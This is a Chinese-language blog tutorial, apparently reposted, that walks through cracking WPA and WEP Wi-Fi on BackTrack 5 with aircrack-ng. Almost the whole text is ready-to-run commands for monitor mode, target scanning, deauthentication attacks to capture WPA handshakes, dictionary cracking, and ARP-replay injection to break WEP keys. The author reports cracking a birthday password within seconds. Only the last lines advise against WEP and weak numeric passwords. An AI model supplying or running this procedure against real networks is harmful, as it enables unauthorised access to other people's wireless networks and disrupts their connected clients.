BT5下WPA和WEP網絡破解

一,網卡設置

(1)首先查看網絡連接:

root@bt:~# ifconfig -a #查看所有連接


(2)激活無線網卡

root@bt:~#ifconfig wlan0 up

(3)設置無線網卡爲混雜模式

root@bt:~#airmon-ng start wlan0


(4)再次查看網絡連接發現多了個mon0接口,以下就通過mon0開始破解無線網絡

root@bt:~#ifconfig -a


二,破解WPA網絡

(1)首先找到目標,看哪個網絡容易破解,一般有客戶端連接的路由器才比較容易破解

root@bt:~#airodump-ng mon0


(2)鎖定目標,開始嘗試破解目標網絡,抓包保存

root@bt:~#airodump-ng -c 11 -w 20121025 mon0

參數說明:

-c 指定掃描信道

-c 11 只掃描信道爲11的無線網線

-w 保存數據包到文件

現在的WPA破解只能是通過暴力破解,主要抓到客戶端與路由器的握手包(handshake)就有可能通過字典猜解 ,

(3)在有客戶端連接的情況下,可以用deauh攻擊讓客戶端下線,客戶端一般都會自動連接,這時就可以抓到握手包了。

對客戶端進行deauth攻擊

root@bt:~#aireplay-ng -0 3 -a E0:05:C5:A7:BB:92 -c 98:0C:82:AC:1A:10 mon0

參數說明:-0 攻擊模式是deauth, -0 3 發送3次deauth攻擊

-a AP的mac 地址

-c 客戶端地址


注入後我連接到路由器的手機馬上掉線,過幾秒鐘又自動連接了


攻擊的時候同時抓包,抓包窗口會提示抓到握手包: WPA handshake:E0:05:C5:A7:BB:92

(4)deauth攻擊的目的已經達到,現在可以停止抓包了,開始破解WPA密碼:

root@bt:~#aircrack-ng -w WPA.txt 20121025-01.cap

參數說明:-w 字典文件

選擇有handshake的無線網絡,開始破解

WPA.txt 是事先在網上下載好的無線WPA字典,包含一些常用的密碼和生日密碼等等


生日密碼被秒破了【驚恐】!!!

三,破解WEP無線網絡

WEP破解是100%能破解出來的,不管多複雜的密碼,只要能夠抓夠足夠的IVS

(1)還是先查找目標網絡:

root@bt:~#airodump-ng –encrypt WEP mon0 #只抓WEP加密的網絡


(2)找到目標網絡之後開始抓包保存

root@bt:~#airodump-ng –ivs -w 20121025 -c 11 mon0

(3)爲了能快速收集IVS,在有客戶端的情況下進行ARP REQUEST 攻擊

root@bt:~#aireplay-ng -3 -b E0:05:C5:A7:BB:92 -h 98:0C:82:AC:1A:10 mon0


(4)收到5000個以上IVS之後,就可以破解了,如果破解不成功再多收集IVS

root@bt:~#aircrack-ng –ivs 20121025*.ivs



破解成功!wep加密基本是100%破解成功,所以一般不要設置加密方式爲WEP,不過不要以爲wpa/wpa2加密就高枕無憂了,

WPA密碼要設置儘量雜點,不要用純數字,8~10位的純數字密碼一般的破解字典都有。

轉自:http://www.greycode.cn/backtrack5-wireless-exp.html

發佈了22 篇原創文章 · 獲贊 3 · 訪問量 4萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章